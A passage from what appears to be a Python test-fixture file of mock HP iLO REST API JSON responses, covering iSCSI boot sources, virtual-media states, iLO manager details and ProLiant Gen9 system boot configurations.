"Type": "HpiSCSISoftwareInitiator.1.0.0",
"iSCSIBootSources": [
{
"StructuredBootString": "NIC.LOM.1.1.iSCSI",
"UEFIDevicePath": null,
"iSCSIAuthenticationMethod": "None",
"iSCSIBootAttemptInstance": 1,
"iSCSIBootAttemptName": "NicBoot1",
"iSCSIBootEnable": "Enabled",
"iSCSIBootLUN": "1",
"iSCSIChapSecret": null,
"iSCSIChapType": "OneWay",
"iSCSIChapUsername": null,
"iSCSIConnectRetry": 0,
"iSCSIConnectTimeoutMS": 1000,
"iSCSIInitiatorGateway": "0.0.0.0",
"iSCSIInitiatorInfoViaDHCP": true,
"iSCSIInitiatorIpAddress": "0.0.0.0",
"iSCSIInitiatorNetmask": "0.0.0.0",
"iSCSIIpAddressType": "IPv4",
"iSCSINicSource": "NicBoot1",
"iSCSIReverseChapSecret": null,
"iSCSIReverseChapUsername": null,
"iSCSITargetInfoViaDHCP": false,
"iSCSITargetIpAddress": "10.10.1.38",
"iSCSITargetName": "iqn.2014-07.com.tecmint:tgt1",
"iSCSITargetTcpPort": 3260
},
{
"StructuredBootString": "NIC.LOM.1.1.iSCSI",
"UEFIDevicePath": null,
"iSCSIAuthenticationMethod": "None",
"iSCSIBootAttemptInstance": 0,
"iSCSIBootAttemptName": "test2",
"iSCSIBootEnable": "Enabled",
"iSCSIBootLUN": "1",
"iSCSIChapSecret": null,
"iSCSIChapType": "OneWay",
"iSCSIChapUsername": null,
"iSCSIConnectRetry": 0,
"iSCSIConnectTimeoutMS": 1000,
"iSCSIInitiatorGateway": "0.0.0.0",
"iSCSIInitiatorInfoViaDHCP": true,
"iSCSIInitiatorIpAddress": "0.0.0.0",
"iSCSIInitiatorNetmask": "0.0.0.0",
"iSCSIIpAddressType": "IPv4",
"iSCSINicSource": "NicBoot1",
"iSCSIReverseChapSecret": null,
"iSCSIReverseChapUsername": null,
"iSCSITargetInfoViaDHCP": false,
"iSCSITargetIpAddress": "10.10.1.38",
"iSCSITargetName": "iqn.2014-07.com.tecmint:tgt1",
"iSCSITargetTcpPort": 3260
},
{
"StructuredBootString": null,
"UEFIDevicePath": null,
"iSCSIAuthenticationMethod": "None",
"iSCSIBootAttemptInstance": 0,
"iSCSIBootAttemptName": "",
"iSCSIBootEnable": "Disabled",
"iSCSIBootLUN": "0",
"iSCSIChapSecret": null,
"iSCSIChapType": "OneWay",
"iSCSIChapUsername": null,
"iSCSIConnectRetry": 0,
"iSCSIConnectTimeoutMS": 100,
"iSCSIInitiatorGateway": "0.0.0.0",
"iSCSIInitiatorInfoViaDHCP": true,
"iSCSIInitiatorIpAddress": "0.0.0.0",
"iSCSIInitiatorNetmask": "0.0.0.0",
"iSCSIIpAddressType": "IPv4",
"iSCSINicSource": null,
"iSCSIReverseChapSecret": null,
"iSCSIReverseChapUsername": null,
"iSCSITargetInfoViaDHCP": true,
"iSCSITargetIpAddress": "0.0.0.0",
"iSCSITargetName": null,
"iSCSITargetTcpPort": 0
},
{
"StructuredBootString": null,
"UEFIDevicePath": null,
"iSCSIAuthenticationMethod": "None",
"iSCSIBootAttemptInstance": 0,
"iSCSIBootAttemptName": "",
"iSCSIBootEnable": "Disabled",
"iSCSIBootLUN": "0",
"iSCSIChapSecret": null,
"iSCSIChapType": "OneWay",
"iSCSIChapUsername": null,
"iSCSIConnectRetry": 0,
"iSCSIConnectTimeoutMS": 100,
"iSCSIInitiatorGateway": "0.0.0.0",
"iSCSIInitiatorInfoViaDHCP": true,
"iSCSIInitiatorIpAddress": "0.0.0.0",
"iSCSIInitiatorNetmask": "0.0.0.0",
"iSCSIIpAddressType": "IPv4",
"iSCSINicSource": null,
"iSCSIReverseChapSecret": null,
"iSCSIReverseChapUsername": null,
"iSCSITargetInfoViaDHCP": true,
"iSCSITargetIpAddress": "0.0.0.0",
"iSCSITargetName": null,
"iSCSITargetTcpPort": 0
}
],
"iSCSIInitiatorName": "iqn.1986-03.com.hp:uefi-p89-mxq45006w5",
"iSCSINicSources": [
"NicBoot1",
"NicBoot2",
"NicBoot3",
"NicBoot4"
],
"links": {
"BaseConfigs": {
"href": "/rest/v1/systems/1/bios/iScsi/BaseConfigs"
},
"Mappings": {
"href": "/rest/v1/systems/1/bios/Mappings"
},
"Settings": {
"href": "/rest/v1/systems/1/bios/iScsi/Settings"
},
"self": {
"href": "/rest/v1/systems/1/bios/iScsi"
}
}
}
"""
RESP_VM_STATUS_FLOPPY_EMPTY = """
{
"Description": "Virtual Removable Media",
"links": {
"self": {
"href": "/rest/v1/Managers/1/VirtualMedia/1"
}
},
"Type": "VirtualMedia.0.9.5",
"Image": "",
"ConnectedVia": "NotConnected",
"MediaTypes": [
"Floppy",
"USBStick"
],
"WriteProtected": false,
"Inserted": false,
"Name": "VirtualMedia"
}
"""
GET_VM_STATUS_FLOPPY_EMPTY = """
{
"WRITE_PROTECT": "NO",
"VM_APPLET": "DISCONNECTED",
"IMAGE_URL": "",
"BOOT_OPTION": "NO_BOOT",
"DEVICE": "FLOPPY",
"IMAGE_INSERTED": "NO"
}
"""
RESP_VM_STATUS_FLOPPY_INSERTED = """
{
"ImageName": "floppy.iso",
"Description": "Virtual Removable Media",
"links": {
"self": {
"href": "/rest/v1/Managers/1/VirtualMedia/1"
}
},
"Type": "VirtualMedia.0.9.5",
"Image": "http://1.1.1.1/floppy.iso",
"ConnectedVia": "URI",
"MediaTypes": [
"Floppy",
"USBStick"
],
"WriteProtected": true,
"Inserted": true,
"Name": "VirtualMedia"
}
"""
GET_VM_STATUS_FLOPPY_INSERTED = """
{
"WRITE_PROTECT": "YES",
"VM_APPLET": "CONNECTED",
"IMAGE_URL": "http://1.1.1.1/floppy.iso",
"BOOT_OPTION": "BOOT_ALWAYS",
"DEVICE": "FLOPPY",
"IMAGE_INSERTED": "YES"
}
"""
RESP_VM_STATUS_CDROM_INSERTED = """
{
"Description": "Virtual Removable Media",
"links": {
"self": {"href": "/rest/v1/Managers/1/VirtualMedia/2"
}
},
"Type": "VirtualMedia.0.9.5",
"Image": "http://foo/foo", "ConnectedVia": "NotConnected",
"MediaTypes": [
"CD",
"DVD"
],
"Oem": {
"Hp": {
"Type": "HpiLOVirtualMedia.0.9.5",
"BootOnNextServerReset": false
}
},
"WriteProtected": true,
"Inserted": true,
"Name": "VirtualMedia"
}
"""
RESP_VM_STATUS_CDROM_EMPTY = """
{
"Description": "Virtual Removable Media",
"links": {
"self": {"href": "/rest/v1/Managers/1/VirtualMedia/2"
}
},
"Type": "VirtualMedia.0.9.5",
"Image": "", "ConnectedVia": "NotConnected",
"MediaTypes": [
"CD",
"DVD"
],
"Oem": {
"Hp": {
"Type": "HpiLOVirtualMedia.0.9.5",
"BootOnNextServerReset": false
}
},
"WriteProtected": true,
"Inserted": false,
"Name": "VirtualMedia"
}
"""
GET_VM_STATUS_CDROM_EMPTY = """
{
"WRITE_PROTECT": "YES",
"VM_APPLET": "DISCONNECTED",
"IMAGE_URL": "",
"BOOT_OPTION": "NO_BOOT",
"DEVICE": "CDROM",
"IMAGE_INSERTED": "NO"}
"""
RESP_VM_STATUS_CDROM_INSERTED = """
{
"ImageName": "cdrom.iso",
"Description": "Virtual Removable Media",
"links": {"self": {"href": "/rest/v1/Managers/1/VirtualMedia/2"}},
"Type": "VirtualMedia.0.9.5",
"Image": "http://1.1.1.1/cdrom.iso",
"ConnectedVia": "URI",
"MediaTypes": [
"CD",
"DVD"
],
"Oem": {
"Hp": {
"Type": "HpiLOVirtualMedia.0.9.5",
"BootOnNextServerReset": false
}
},
"WriteProtected": true,
"Inserted": true,
"Name": "VirtualMedia"
}
"""
GET_VM_STATUS_CDROM_INSERTED = """
{
"WRITE_PROTECT": "YES",
"VM_APPLET": "CONNECTED",
"IMAGE_URL": "http://1.1.1.1/cdrom.iso",
"BOOT_OPTION": "BOOT_ALWAYS",
"DEVICE": "CDROM",
"IMAGE_INSERTED": "YES"
}
"""
PATCH_VM_CDROM = """
{
"Oem": {
"Hp": {
"BootOnNextServerReset": true
}
}
}
"""
GET_MANAGER_DETAILS_NO_VMEDIA = """
{
"AvailableActions":
[
{
"Action": "Reset"
}
],
"CommandShell":
{
"ConnectTypesSupported":
[
"SSH",
"Oem"
],
"Enabled": true,
"MaxConcurrentSessions": 9
},
"Description": "Manager View",
"Firmware":
{
"Current":
{
"VersionString": "iLO 4 v2.20"
}
},
"GraphicalConsole":
{
"ConnectTypesSupported":
[
"KVMIP"
],
"Enabled": true,
"MaxConcurrentSessions": 10
},
"ManagerType": "BMC",
"Model": "iLO 4",
"Name": "Manager",
"Oem":
{
"Hp":
{
"AvailableActions":
[
{
"Action": "ResetRestApiState",
"Capabilities":
[
{
"AllowableValues":
[
"/Oem/Hp"
],
"PropertyName": "Target"
}
]
}
],
"FederationConfig":
{
"IPv6MulticastScope": "Site",
"MulticastAnnouncementInterval": 600,
"MulticastDiscovery": "Enabled",
"MulticastTimeToLive": 5,
"iLOFederationManagement": "Enabled"
},
"Firmware":
{
"Current":
{
"Date": "Feb 09 2015",
"DebugBuild": false,
"MajorVersion": 2,
"MinorVersion": 20,
"Time": "",
"VersionString": "iLO 4 v2.20"
}
},
"License":
{
"LicenseKey": "32Q6W-PQWTB-H7XYL-39968-RR53R",
"LicenseString": "iLO 4 Advanced",
"LicenseType": "Perpetual"
},
"RequiredLoginForiLORBSU": false,
"SerialCLISpeed": 9600,
"SerialCLIStatus": "EnabledAuthReq",
"Type": "HpiLO.0.13.0",
"VSPLogDownloadEnabled": false,
"iLOSelfTestResults":
[
{
"Notes": "",
"SelfTestName": "NVRAMData",
"Status": "OK"
},
{
"Notes": "Controller firmware revision 2.09.00 ",
"SelfTestName": "EmbeddedFlash/SDCard",
"Status": "OK"
},
{
"Notes": "",
"SelfTestName": "EEPROM",
"Status": "OK"
},
{
"Notes": "",
"SelfTestName": "HostRom",
"Status": "OK"
},
{
"Notes": "",
"SelfTestName": "SupportedHost",
"Status": "OK"
},
{
"Notes": "ProLiant BL460c Gen9 System Programmable \
Logic Device version 0x13",
"SelfTestName": "CPLDPAL0",
"Status": "Informational"
},
{
"Notes": "ProLiant BL460c Gen9 SAS Programmable \
Logic Device version 0x01",
"SelfTestName": "CPLDPAL1",
"Status": "Informational"
}
],
"links":
{
"ActiveHealthSystem":
{
"href": "/rest/v1/Managers/1/ActiveHealthSystem"
},
"DateTimeService":
{
"href": "/rest/v1/Managers/1/DateTime"
},
"EmbeddedMediaService":
{
"href": "/rest/v1/Managers/1/EmbeddedMedia"
},
"FederationDispatch":
{
"extref": "/dispatch"
},
"FederationGroups":
{
"href": "/rest/v1/Managers/1/FederationGroups"
},
"FederationPeers":
{
"href": "/rest/v1/Managers/1/FederationPeers"
},
"LicenseService":
{
"href": "/rest/v1/Managers/1/LicenseService"
},
"UpdateService":
{
"href": "/rest/v1/Managers/1/UpdateService"
},
"VSPLogLocation":
{
"extref": "/sol.log.gz"
}
}
}
},
"SerialConsole":
{
"ConnectTypesSupported":
[
"SSH",
"IPMI",
"Oem"
],
"Enabled": true,
"MaxConcurrentSessions": 13
},
"Status":
{
"State": "Enabled"
},
"Type": "Manager.0.10.0",
"UUID": "83590768-e977-575a-927a-b3de8f692d4f",
"links":
{
"EthernetNICs":
{
"href": "/rest/v1/Managers/1/NICs"
},
"Logs":
{
"href": "/rest/v1/Managers/1/Logs"
},
"ManagerForServers":
[
{
"href": "/rest/v1/Systems/1"
}
],
"NetworkService":
{
"href": "/rest/v1/Managers/1/NetworkService"
},
"self":
{
"href": "/rest/v1/Managers/1"
}
}
}
"""
RESP_VM_STATUS_CDROM_MISSING = """
{
"Description": "Virtual Removable Media",
"links": {
"self": {"href": "/rest/v1/Managers/1/VirtualMedia/2"
}
},
"Type": "VirtualMedia.0.9.5",
"Image": "", "ConnectedVia": "NotConnected",
"MediaTypes": [
"DVD"
],
"Oem": {
"Hp": {
"Type": "HpiLOVirtualMedia.0.9.5",
"BootOnNextServerReset": false
}
},
"WriteProtected": true,
"Inserted": false,
"Name": "VirtualMedia"
}
"""
RESP_BODY_FOR_SYSTEM_WITH_CDROM = """
{
"AssetTag": "",
"AvailableActions": [
{
"Action": "Reset",
"Capabilities": [
{
"AllowableValues": [
"On",
"ForceOff",
"ForceRestart",
"Nmi",
"PushPowerButton"
],
"PropertyName": "ResetType"
}
]
}
],
"Bios": {
"Current": {
"VersionString": "I36 v1.40 (01/28/2015)"
}
},
"Boot": {
"BootSourceOverrideEnabled": "Once",
"BootSourceOverrideSupported": [
"None",
"Cd",
"Hdd",
"Usb",
"Utilities",
"Diags",
"BiosSetup",
"Pxe",
"UefiShell",
"UefiTarget"
],
"BootSourceOverrideTarget": "Cd",
"UefiTargetBootSourceOverride": "None",
"UefiTargetBootSourceOverrideSupported": [
"HD.Emb.1.2",
"Generic.USB.1.1",
"NIC.FlexLOM.1.1.IPv4",
"NIC.FlexLOM.1.1.IPv6",
"CD.Virtual.2.1"
]
},
"Description": "Computer System View",
"HostCorrelation": {
"HostMACAddress": [
"6c:c2:17:39:fe:80",
"6c:c2:17:39:fe:88"
],
"HostName": "",
"IPAddress": [
"",
""
]
},
"IndicatorLED": "Off",
"Manufacturer": "HP",
"Memory": {
"TotalSystemMemoryGB": 16
},
"Model": "ProLiant BL460c Gen9",
"Name": "Computer System",
"Oem": {
"Hp": {
"AvailableActions": [
{
"Action": "PowerButton",
"Capabilities": [
{
"AllowableValues": [
"Press",
"PressAndHold"
],
"PropertyName": "PushType"
},
{
"AllowableValues": [
"/Oem/Hp"
],
"PropertyName": "Target"
}
]
},
{
"Action": "SystemReset",
"Capabilities": [
{
"AllowableValues": [
"ColdBoot"
],
"PropertyName": "ResetType"
},
{
"AllowableValues": [
"/Oem/Hp"
],
"PropertyName": "Target"
}
]
}
],
"Battery": [],
"Bios": {
"Backup": {
"Date": "v1.40 (01/28/2015)",
"Family": "I36",
"VersionString": "I36 v1.40 (01/28/2015)"
},
"Current": {
"Date": "01/28/2015",
"Family": "I36",
"VersionString": "I36 v1.40 (01/28/2015)"
},
"UefiClass": 2
},
"DeviceDiscoveryComplete": {
"AMSDeviceDiscovery": "NoAMS",
"SmartArrayDiscovery": "Initial",
"vAuxDeviceDiscovery": "DataIncomplete",
"vMainDeviceDiscovery": "ServerOff"
},
"PostState": "PowerOff",
"PowerAllocationLimit": 500,
"PowerAutoOn": "PowerOn",
"PowerOnDelay": "Minimum",
"PowerRegulatorMode": "Dynamic",
"PowerRegulatorModesSupported": [
"OSControl",
"Dynamic",
"Max",
"Min"
],
"ServerSignature": 0,
"Type": "HpComputerSystemExt.0.10.1",
"VirtualProfile": "Inactive",
"VirtualUUID": null,
"links": {
"BIOS": {
"href": "/rest/v1/systems/1/bios"
},
"MEMORY": {
"href": "/rest/v1/Systems/1/Memory"
},
"PCIDevices": {
"href": "/rest/v1/Systems/1/PCIDevices"
},
"PCISlots": {
"href": "/rest/v1/Systems/1/PCISlots"
},
"SecureBoot": {
"href": "/rest/v1/Systems/1/SecureBoot"
}
}
}
},
"Power": "Off",
"Processors": {
"Count": 1,
"ProcessorFamily": "Intel(R) Xeon(R) CPU E5-2609 v3 @ 1.90GHz",
"Status": {
"HealthRollUp": "OK"
}
},
"SKU": "727021-B21",
"SerialNumber": "SGH449WNL3",
"Status": {
"Health": "OK",
"State": "Disabled"
},
"SystemType": "Physical",
"Type": "ComputerSystem.0.9.6",
"UUID": "30373237-3132-4753-4834-3439574E4C33",
"links": {
"Chassis": [
{
"href": "/rest/v1/Chassis/1"
}
],
"Logs": {
"href": "/rest/v1/Systems/1/Logs"
},
"ManagedBy": [
{
"href": "/rest/v1/Managers/1"
}
],
"self": {
"href": "/rest/v1/Systems/1"
}
}
}
"""
RESP_BODY_WITH_UEFI_SHELL = """
{
"AssetTag": "",
"AvailableActions": [
{
"Action": "Reset",
"Capabilities": [
{
"AllowableValues": [
"On",
"ForceOff",
"ForceRestart",
"Nmi",
"PushPowerButton"
],
"PropertyName": "ResetType"
}
]
}
],
"Bios": {
"Current": {
"VersionString": "I36 v1.40 (01/28/2015)"
}
},
"Boot": {
"BootSourceOverrideEnabled": "Once",
"BootSourceOverrideSupported": [
"None",
"Cd",
"Hdd",
"Usb",
"Utilities",
"Diags",
"BiosSetup",
"Pxe",
"UefiShell",
"UefiTarget"
],
"BootSourceOverrideTarget": "UefiShell",
"UefiTargetBootSourceOverride": "None",
"UefiTargetBootSourceOverrideSupported": [
"HD.Emb.1.2",
"Generic.USB.1.1",
"NIC.FlexLOM.1.1.IPv4",
"NIC.FlexLOM.1.1.IPv6",
"CD.Virtual.2.1"
]
},
"Description": "Computer System View",
"HostCorrelation": {
"HostMACAddress": [
"6c:c2:17:39:fe:80",
"6c:c2:17:39:fe:88"
],
"HostName": "",
"IPAddress": [
"",
""
]
},
"IndicatorLED": "Off",
"Manufacturer": "HP",
"Memory": {
"TotalSystemMemoryGB": 16
},
"Model": "ProLiant BL460c Gen9",
"Name": "Computer System",
"Oem": {
"Hp": {
"AvailableActions": [
{
"Action": "PowerButton",
"Capabilities": [
{
"AllowableValues": [
"Press",
"PressAndHold"
],
"PropertyName": "PushType"
},
{
"AllowableValues": [
"/Oem/Hp"
],
"PropertyName": "Target"
}
]
},
{
"Action": "SystemReset",
"Capabilities": [
{
"AllowableValues": [
"ColdBoot"
],
"PropertyName": "ResetType"
},
{
"AllowableValues": [
"/Oem/Hp"
],
"PropertyName": "Target"
}
]
}
],
"Battery": [],
"Bios": {
"Backup": {
"Date": "v1.40 (01/28/2015)",
"Family": "I36",
"VersionString": "I36 v1.40 (01/28/2015)"
},
"Current": {
"Date": "01/28/2015",
"Family": "I36",
"VersionString": "I36 v1.40 (01/28/2015)"
},
"UefiClass": 2
},
"DeviceDiscoveryComplete": {
"AMSDeviceDiscovery": "NoAMS",
"SmartArrayDiscovery": "Initial",
"vAuxDeviceDiscovery": "DataIncomplete",
"vMainDeviceDiscovery": "ServerOff"
},
"PostState": "PowerOff",
"PowerAllocationLimit": 500,
"PowerAutoOn": "PowerOn",
"PowerOnDelay": "Minimum",
"PowerRegulatorMode": "Dynamic",
"PowerRegulatorModesSupported": [
"OSControl",
"Dynamic",
"Max",
"Min"
],
"ServerSignature": 0,
"Type": "HpComputerSystemExt.0.10.1",
"VirtualProfile": "Inactive",
"VirtualUUID": null,
"links": {
"BIOS": {
"href": "/rest/v1/systems/1/bios"
},
"MEMORY": {
"href": "/rest/v1/Systems/1/Memory"
},
"PCIDevices": {
"href": "/rest/v1/Systems/1/PCIDevices"
},
"PCISlots": {
"href": "/rest/v1/Systems/1/PCISlots"
},
"SecureBoot": {
"href": "/rest/v1/Systems/1/SecureBoot"
}
}
}
},
"Power": "Off",
"Processors": {
"Count": 1,
"ProcessorFamily": "Intel(R) Xeon(R) CPU E5-2609 v3 @ 1.90GHz",
"Status": {
"HealthRollUp": "OK"
}
},
"SKU": "727021-B21",
"SerialNumber": "SGH449WNL3",
"Status": {
"Health": "OK",
"State": "Disabled"
},
"SystemType": "Physical",
"Type": "ComputerSystem.0.9.6",
"UUID": "30373237-3132-4753-4834-3439574E4C33",
"links": {
"Chassis": [
{
"href": "/rest/v1/Chassis/1"
}
],
"Logs": {
"href": "/rest/v1/Systems/1/Logs"
},
"ManagedBy": [
{
"href": "/rest/v1/Managers/1"
}
],
"self": {
"href": "/rest/v1/Systems/1"
}
}
}
"""
RESP_BODY_FOR_SYSTEM_WITHOUT_BOOT = """
{
"AssetTag": "",
"AvailableActions": [
{
"Action": "Reset",
"Capabilities": [
{
"AllowableValues": [
"On",
"ForceOff",
"ForceRestart",
"Nmi",
"PushPowerButton"
],
"PropertyName": "ResetType"
}
]
}
],
"Bios": {
"Current": {
"VersionString": "I36 v1.40 (01/28/2015)"
}
},
"Description": "Computer System View",
"HostCorrelation": {
"HostMACAddress": [
"6c:c2:17:39:fe:80",
"6c:c2:17:39:fe:88"
],
"HostName": "",
"IPAddress": [
"",
""
]
},
"IndicatorLED": "Off",
"Manufacturer": "HP",
"Memory": {
"TotalSystemMemoryGB": 16
},
"Model": "ProLiant BL460c Gen9",
"Name": "Computer System",
"Oem": {
"Hp": {
"AvailableActions": [
{
"Action": "PowerButton",
"Capabilities": [
{
"AllowableValues": [
"Press",
"PressAndHold"
],
"PropertyName": "PushType"
},
{
"AllowableValues": [
"/Oem/Hp"
],
"PropertyName": "Target"
}
]
},
{
"Action": "SystemReset",
"Capabilities": [
{
"AllowableValues": [
"ColdBoot"
],
"PropertyName": "ResetType"
},
{
"AllowableValues": [
"/Oem/Hp"
],
"PropertyName": "Target"
}
]
}
],
"Battery": [],
"Bios": {
"Backup": {
"Date": "v1.40 (01/28/2015)",
"Family": "I36",
"VersionString": "I36 v1.40 (01/28/2015)"
},
"Current": {
"Date": "01/28/2015",
"Family": "I36",
"VersionString": "I36 v1.40 (01/28/2015)"
},
"UefiClass": 2
},
"DeviceDiscoveryComplete": {
"AMSDeviceDiscovery": "NoAMS",
"SmartArrayDiscovery": "Initial",
"vAuxDeviceDiscovery": "DataIncomplete",
"vMainDeviceDiscovery": "ServerOff"
},
"PostState": "PowerOff",
"PowerAllocationLimit": 500,
"PowerAutoOn": "PowerOn",
"PowerOnDelay": "Minimum",
"PowerRegulatorMode": "Dynamic",
"PowerRegulatorModesSupported": [
"OSControl",
"Dynamic",
"Max",
"Min"
],
"ServerSignature": 0,
"Type": "HpComputerSystemExt.0.10.1",
"VirtualProfile": "Inactive",
"VirtualUUID": null,
"links": {
"BIOS": {
"href": "/rest/v1/systems/1/bios"
},
"MEMORY": {
"href": "/rest/v1/Systems/1/Memory"
},
"PCIDevices": {
"href": "/rest/v1/Systems/1/PCIDevices"
},
"PCISlots": {
"href": "/rest/v1/Systems/1/PCISlots"
},
"SecureBoot": {
"href": "/rest/v1/Systems/1/SecureBoot"
}
}
}
},
"Power": "Off",
"Processors": {
"Count": 1,
"ProcessorFamily": "Intel(R) Xeon(R) CPU E5-2609 v3 @ 1.90GHz",
"Status": {
"HealthRollUp": "OK"
}
},
"SKU": "727021-B21",
"SerialNumber": "SGH449WNL3",
"Status": {
"Health": "OK",
"State": "Disabled"
},
"SystemType": "Physical",
"Type": "ComputerSystem.0.9.6",
"UUID": "30373237-3132-4753-4834-3439574E4C33",
"links": {
"Chassis": [
{
"href": "/rest/v1/Chassis/1"
}
],
"Logs": {
"href": "/rest/v1/Systems/1/Logs"
},
"ManagedBy": [
{
"href": "/rest/v1/Managers/1"
}
],
"self": {
"href": "/rest/v1/Systems/1"
}
}
}
"""
SYSTEM_WITH_CDROM_CONT = """
{
"AssetTag": "",
"AvailableActions": [
{
"Action": "Reset",
"Capabilities": [
{
"AllowableValues": [
"On",
"ForceOff",
"ForceRestart",
"Nmi",
"PushPowerButton"
],
"PropertyName": "ResetType"
}
]
}
],
"Bios": {
"Current": {
"VersionString": "I36 v1.40 (01/28/2015)"
}
},
"Boot": {
"BootSourceOverrideEnabled": "Continuous",
"BootSourceOverrideSupported": [
"None",
"Cd",
"Hdd",
"Usb",
"Utilities",
"Diags",
"BiosSetup",
"Pxe",
"UefiShell",
"UefiTarget"
],
"BootSourceOverrideTarget": "Cd",
"UefiTargetBootSourceOverride": "None",
"UefiTargetBootSourceOverrideSupported": [
"HD.Emb.1.2",
"Generic.USB.1.1",
"NIC.FlexLOM.1.1.IPv4",
"NIC.FlexLOM.1.1.IPv6",
"CD.Virtual.2.1"
]
},
"Description": "Computer System View",
"HostCorrelation": {
"HostMACAddress": [
"6c:c2:17:39:fe:80",
"6c:c2:17:39:fe:88"
],
"HostName": "",
"IPAddress": [
"",
""
]
},
"IndicatorLED": "Off",
"Manufacturer": "HP",
"Memory": {
"TotalSystemMemoryGB": 16
},
"Model": "ProLiant BL460c Gen9",
"Name": "Computer System",
"Oem": {
"Hp": {
"AvailableActions": [
{
"Action": "PowerButton",
"Capabilities": [
{
"AllowableValues": [
"Press",
"PressAndHold"
],
"PropertyName": "PushType"
},
{
"AllowableValues": [
"/Oem/Hp"
],
"PropertyName": "Target"
}
]
},
{
"Action": "SystemReset",
"Capabilities": [
{
"AllowableValues": [
"ColdBoot"
],
"PropertyName": "ResetType"
},
{
"AllowableValues": [
"/Oem/Hp"
],
"PropertyName": "Target"
}
]
}
],
"Battery": [],
"Bios": {
"Backup": {
"Date": "v1.40 (01/28/2015)",
"Family": "I36",
"VersionString": "I36 v1.40 (01/28/2015)"
},
"Current": {
"Date": "01/28/2015",
"Family": "I36",
"VersionString": "I36 v1.40 (01/28/2015)"
},
"UefiClass": 2
},
"DeviceDiscoveryComplete": {
"AMSDeviceDiscovery": "NoAMS",
"SmartArrayDiscovery": "Initial",
"vAuxDeviceDiscovery": "DataIncomplete",
"vMainDeviceDiscovery": "ServerOff"
},
"PostState": "PowerOff",
"PowerAllocationLimit": 500,
"PowerAutoOn": "PowerOn",
"PowerOnDelay": "Minimum",
"PowerRegulatorMode": "Dynamic",
"PowerRegulatorModesSupported": [
"OSControl",
"Dynamic",
"Max",
"Min"
],
"ServerSignature": 0,
"Type": "HpComputerSystemExt.0.10.1",
"VirtualProfile": "Inactive",
"VirtualUUID": null,
"links": {
"BIOS": {
"href": "/rest/v1/systems/1/bios"
},
"MEMORY": {
"href": "/rest/v1/Systems/1/Memory"
},
"PCIDevices": {
"href": "/rest/v1/Systems/1/PCIDevices"
},
"PCISlots": {
"href": "/rest/v1/Systems/1/PCISlots"
},
"SecureBoot": {
"href": "/rest/v1/Systems/1/SecureBoot"
}
}
}
},
"Power": "Off",
"Processors": {
"Count": 1,
"ProcessorFamily": "Intel(R) Xeon(R) CPU E5-2609 v3 @ 1.90GHz",
"Status": {
"HealthRollUp": "OK"
}
},
"SKU": "727021-B21",
"SerialNumber": "SGH449WNL3",
"Status": {
"Health": "OK",
"State": "Disabled"
},
"SystemType": "Physical",
"Type": "ComputerSystem.0.9.6",
"UUID": "30373237-3132-4753-4834-3439574E4C33",
"links": {
"Chassis": [
{
"href": "/rest/v1/Chassis/1"
}
],
"Logs": {
"href": "/rest/v1/Systems/1/Logs"
},
"ManagedBy": [
{
"href": "/rest/v1/Managers/1"
}
],
"self": {
"href": "/rest/v1/Systems/1"
}
}
}
"""
SYSTEM_WITH_UEFISHELL_CONT = """
{
"AssetTag": "",
"AvailableActions": [
{
"Action": "Reset",
"Capabilities": [
{
"AllowableValues": [
"On",
"ForceOff",
"ForceRestart",
"Nmi",
"PushPowerButton"
],
"PropertyName": "ResetType"
}
]
}
],
"Bios": {
"Current": {
"VersionString": "I36 v1.40 (01/28/2015)"
}
},
"Boot": {
"BootSourceOverrideEnabled": "Continuous",
"BootSourceOverrideSupported": [
"None",
"Cd",
"Hdd",
"Usb",
"Utilities",
"Diags",
"BiosSetup",
"Pxe",
"UefiShell",
"UefiTarget"
],
"BootSourceOverrideTarget": "UefiShell",
"UefiTargetBootSourceOverride": "None",
"UefiTargetBootSourceOverrideSupported": [
"HD.Emb.1.2",
"Generic.USB.1.1",
"NIC.FlexLOM.1.1.IPv4",
"NIC.FlexLOM.1.1.IPv6",
"CD.Virtual.2.1"
]
},
"Description": "Computer System View",
"HostCorrelation": {
"HostMACAddress": [
"6c:c2:17:39:fe:80",
"6c:c2:17:39:fe:88"
],
"HostName": "",
"IPAddress": [
"",
""
]
},
"IndicatorLED": "Off",
"Manufacturer": "HP",
"Memory": {
"TotalSystemMemoryGB": 16
},
"Model": "ProLiant BL460c Gen9",
"Name": "Computer System",
"Oem": {
"Hp": {
"AvailableActions": [
{
"Action": "PowerButton",
"Capabilities": [
{
"AllowableValues": [
"Press",
"PressAndHold"
],
"PropertyName": "PushType"
},
{
"AllowableValues": [
"/Oem/Hp"
],
"PropertyName": "Target"
}
]
},
{
"Action": "SystemReset",
"Capabilities": [
{
"AllowableValues": [
"ColdBoot"
],
"PropertyName": "ResetType"
},
{
"AllowableValues": [
"/Oem/Hp"
],
"PropertyName": "Target"
}
]
}
],
"Battery": [],
"Bios": {
"Backup": {
"Date": "v1.40 (01/28/2015)",
"Family": "I36",
"VersionString": "I36 v1.40 (01/28/2015)"
},
"Current": {
"Date": "01/28/2015",
"Family": "I36",
"VersionString": "I36 v1.40 (01/28/2015)"
},
"UefiClass": 2
},
"DeviceDiscoveryComplete": {
"AMSDeviceDiscovery": "NoAMS",
"SmartArrayDiscovery": "Initial",
"vAuxDeviceDiscovery": "DataIncomplete",
"vMainDeviceDiscovery": "ServerOff"
},
"PostState": "PowerOff",
"PowerAllocationLimit": 500,
"PowerAutoOn": "PowerOn",
"PowerOnDelay": "Minimum",
"PowerRegulatorMode": "Dynamic",
"PowerRegulatorModesSupported": [
"OSControl",
"Dynamic",
"Max",
"Min"
],
"ServerSignature": 0,
"Type": "HpComputerSystemExt.0.10.1",
"VirtualProfile": "Inactive",
"VirtualUUID": null,
"links": {
"BIOS": {
"href": "/rest/v1/systems/1/bios"
},
"MEMORY": {
"href": "/rest/v1/Systems/1/Memory"
},
"PCIDevices": {
"href": "/rest/v1/Systems/1/PCIDevices"
},
"PCISlots": {
"href": "/rest/v1/Systems/1/PCISlots"
},
"SecureBoot": {
"href": "/rest/v1/Systems/1/SecureBoot"
}
}
}
},
"Power": "Off",
"Processors": {
"Count": 1,
"ProcessorFamily": "Intel(R) Xeon(R) CPU E5-2609 v3 @ 1.90GHz",
"Status": {
"HealthRollUp": "OK"
}
},
"SKU": "727021-B21",
"SerialNumber": "SGH449WNL3",
"Status": {
"Health": "OK",
"State": "Disabled"
},
"SystemType": "Physical",
"Type": "ComputerSystem.0.9.6",
"UUID": "30373237-3132-4753-4834-3439574E4C33",
"links": {
"Chassis": [
{
"href": "/rest/v1/Chassis/1"
}
],
"Logs": {
"href": "/rest/v1/Systems/1/Logs"
},
"ManagedBy": [
{
"href": "/rest/v1/Managers/1"
}
],
"self": {
